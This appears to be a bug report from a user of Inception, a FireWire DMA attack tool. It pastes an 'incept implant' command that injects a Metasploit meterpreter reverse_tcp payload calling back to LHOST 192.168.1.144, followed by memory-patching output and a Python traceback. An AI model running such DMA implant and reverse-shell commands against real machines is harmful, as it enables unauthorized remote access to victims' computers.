incept implant error "'list' object has no attribute 'length'"
Having trouble using the implant module. I've tried on Kali 2.0 and built a fresh Debian 8.5 build and followed the installation guide. It's probably something I've overlooked but both OS's give me the error below when attempting to use the implant module. The unlock module works great!
Help is appreciated.
root@FireStorm:/home/firewire# incept implant --msfpw password --msfopts LHOST=192.168.1.144
| | | ||| |||| ||| ||| _| || _| _| _| || _| _| _| _| _| _| _| _| _| || _| _| _| _| | | ||| ||| _| _| _| _| _| _| _| _| _| || _| _| _| _| _| _| _| _| || | | | ||| |||| _| _| _| || _| _|
v.0.4.0 (C) Carsten Maartmann-Moe 2016 Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter
| | | ||| |||| ||| ||| _| || _| _| _| || _| _| _| _| _| _| _| _| _| || _| _| _| _| | | ||| ||| _| _| _| _| _| _| _| _| _| || _| _| _| _| _| _| _| _| || | | | ||| |||| _| _| _| || _| _|
v.0.4.0 (C) Carsten Maartmann-Moe 2016 Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter
[*] FireWire devices on the bus (names may appear blank):
[1] Vendor (ID): MICROSOFT CORP. (0x50f2) | Product (ID): (0x0)
[] Only one device present, device auto-selected as target [] Selected device: MICROSOFT CORP. [] Initializing bus and enabling SBP-2, please wait or press Ctrl+C [!] Warning: This module currently only work as a proof-of-concept against Windows 7 SP1 x86. No other OSes, versions or architectures are supported, nor is there any guarantee that they will be supported in the future. If you want to change this, send me a wad of cash in unmarked dollar bills or a pull request on github. [?] What MSF payload do you want to use? windows/meterpreter/reverse_tcp [] Selected options: [] LHOST: 192.168.1.144 [] LPORT: 4444 [] EXITFUNC: thread [] Stage 1: Searcing for injection point [=====================> ] 1659 MiB ( 41%) {0000fc4e8287000000} [] Signature found at 0x67bc518c in page no. 424901 [*] Patching at 0x67bc518c [!] Warning: Something went dreadfully wrong, full stack trace below: 'list' object has no attribute 'length'
Traceback (most recent call last): File "/usr/local/lib/python3.4/dist-packages/inception-0.4.0-py3.4.egg/EGG-INFO/scripts/incept", line 173, in main module.run(opts, memspace) File "/usr/local/lib/python3.4/dist-packages/inception-0.4.0-py3.4.egg/inception/modules/implant.py", line 278, in run backup = memspace.patch(address, signature.chunks) File "/usr/local/lib/python3.4/dist-packages/inception-0.4.0-py3.4.egg/inception/memory.py", line 226, in patch backup = self.interface.read(address, signature.length) AttributeError: 'list' object has no attribute 'length'
root@FireStorm:/home/firewire#